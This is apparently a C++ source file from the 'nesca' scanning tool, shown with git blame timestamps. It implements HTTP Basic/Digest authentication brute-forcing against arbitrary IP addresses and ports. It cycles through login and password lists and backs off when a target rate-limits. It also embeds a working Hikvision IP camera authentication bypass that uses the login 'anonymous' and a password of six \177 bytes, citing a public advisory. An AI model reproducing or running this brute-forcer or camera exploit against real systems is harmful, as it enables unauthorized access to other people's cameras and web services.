nesca/BasicAuth.cpp

117 lines
3.6 KiB
C++
Raw Normal View History

2015-03-22 00:43:15 +00:00
#include "BasicAuth.h"
2015-03-25 14:29:08 +00:00
#include "FileUpdater.h"
2015-03-13 14:27:21 +00:00
2015-04-19 00:28:46 +00:00
int BA::checkOutput(const string *buffer, const char *ip, const int port) {
if((Utils::ustrstr(*buffer, "200 ok") != -1 ||
Utils::ustrstr(*buffer, "http/1.0 200") != -1 ||
Utils::ustrstr(*buffer, "http/1.1 200") != -1)
&& Utils::ustrstr(*buffer, "http/1.1 401 ") == -1
&& Utils::ustrstr(*buffer, "http/1.0 401 ") == -1
&& Utils::ustrstr(*buffer, "<statusValue>401</statusValue>") == -1
&& Utils::ustrstr(*buffer, "<statusString>Unauthorized</statusString>") == -1
&& Utils::ustrstr(*buffer, "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>") == -1
&& Utils::ustrstr(*buffer, "Неправильны") == -1
2015-03-16 14:29:34 +00:00
) {
2015-04-19 00:28:46 +00:00
return 1;
2015-03-22 00:43:15 +00:00
}
2015-04-19 09:33:26 +00:00
else if (Utils::ustrstr(*buffer, "http/1.1 404") != -1
|| Utils::ustrstr(*buffer, "http/1.0 404") != -1) {
stt->doEmitionRedFoundData("BA - 404 " + QString(ip) + ":" + QString::number(port));
return -2;
}
else if (Utils::ustrstr(*buffer, "503 service unavailable") != -1
|| Utils::ustrstr(*buffer, "http/1.1 503") != -1
|| Utils::ustrstr(*buffer, "http/1.0 503") != -1
|| Utils::ustrstr(*buffer, "400 BAD_REQUEST") != -1
|| Utils::ustrstr(*buffer, "400 bad request") != -1
|| Utils::ustrstr(*buffer, "403 Forbidden") != -1
2015-03-22 00:43:15 +00:00
)
{
stt->doEmition_BARedData("[.] 503/400/403 - Waiting 30sec (" + QString(ip) + ":" + QString::number(port) + ")");
Sleep(30000);
2015-04-19 00:28:46 +00:00
return -1;
2015-03-22 00:43:15 +00:00
}
2015-03-16 14:29:34 +00:00
2015-04-19 00:28:46 +00:00
return 0;
2015-03-16 14:29:34 +00:00
}
//http://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities 2
inline bool commenceHikvisionEx1(const char *ip, const int port, bool digestMode) {
std::string lpString = string("anonymous") + ":" + string("\177\177\177\177\177\177");
string buffer;
int res = Connector::nConnect(ip, port, &buffer, NULL, NULL, &lpString, digestMode);
2015-04-19 00:28:46 +00:00
if (res > 0) {
if (BA::checkOutput(&buffer, ip, port) == 1) return 1;
}
return 0;
}
2015-04-18 23:00:40 +00:00
lopaStr BA::BABrute(const char *ip, const int port, bool digestMode) {
2015-03-16 14:29:34 +00:00
string buffer;
string lpString;
2015-04-04 12:43:22 +00:00
lopaStr lps = {"UNKNOWN", "", ""};
2015-03-24 14:29:27 +00:00
int passCounter = 0;
2015-04-04 07:24:31 +00:00
int res = 0;
2015-03-16 14:29:34 +00:00
if (commenceHikvisionEx1(ip, port, digestMode)) {
stt->doEmitionGreenFoundData("Hikvision exploit triggered! (" +
QString(ip) + ":" +
QString::number(port) + ")");
strcpy(lps.login, "anonymous");
strcpy(lps.pass, "\177\177\177\177\177\177");
return lps;
}
2015-03-16 14:29:34 +00:00
for(int i = 0; i < MaxLogin; ++i) {
for (int j = 0; j < MaxPass; ++j) {
2015-03-25 14:29:08 +00:00
FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready;});
2015-03-16 14:29:34 +00:00
if (!globalScanFlag) return lps;
2015-03-25 14:29:08 +00:00
lpString = string(loginLst[i]) + ":" + string(passLst[j]);
2015-03-16 14:29:34 +00:00
2015-04-18 23:00:40 +00:00
res = Connector::nConnect(ip, port, &buffer, NULL, NULL, &lpString, digestMode);
2015-04-04 07:24:31 +00:00
if (res == -2) return lps;
else if (res != -1) {
2015-04-19 00:28:46 +00:00
res = checkOutput(&buffer, ip, port);
2015-04-19 09:33:26 +00:00
if (res == -2) return lps;
2015-04-19 00:28:46 +00:00
if (res == -1) {
++i;
break;
}
if (res == 1) {
2015-04-04 07:24:31 +00:00
strcpy(lps.login, loginLst[i]);
strcpy(lps.pass, passLst[j]);
return lps;
};
}
2015-03-16 14:29:34 +00:00
2015-03-23 17:47:48 +00:00
if (BALogSwitched) stt->doEmitionBAData("BA: " + QString(ip) + ":" + QString::number(port) +
2015-03-25 14:29:08 +00:00
"; l/p: " + QString(loginLst[i]) + ":" + QString(passLst[j]) + "; - Progress: (" +
2015-03-22 10:13:17 +00:00
QString::number((++passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%)");
2015-03-22 00:43:15 +00:00
Sleep(100);
2015-03-16 14:29:34 +00:00
}
}
2015-03-13 14:27:21 +00:00
2015-03-16 14:29:34 +00:00
return lps;
2015-03-13 14:27:21 +00:00
}
2015-04-18 23:00:40 +00:00
lopaStr BA::BALobby(const char *ip, const int port, bool digestMode) {
2015-04-02 12:33:49 +00:00
if(gMaxBrutingThreads > 0) {
2015-03-13 14:27:21 +00:00
2015-04-02 12:33:49 +00:00
while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000);
2015-03-13 14:27:21 +00:00
2015-04-04 12:43:22 +00:00
++baCount;
++BrutingThrds;
2015-04-18 23:00:40 +00:00
const lopaStr &lps = BABrute(ip, port, digestMode);
2015-04-04 12:43:22 +00:00
--BrutingThrds;
2015-04-02 12:33:49 +00:00
return lps;
} else {
2015-04-04 12:43:22 +00:00
lopaStr lps = {"UNKNOWN", "", ""};
2015-04-02 12:33:49 +00:00
return lps;
}
2015-03-13 14:27:21 +00:00
}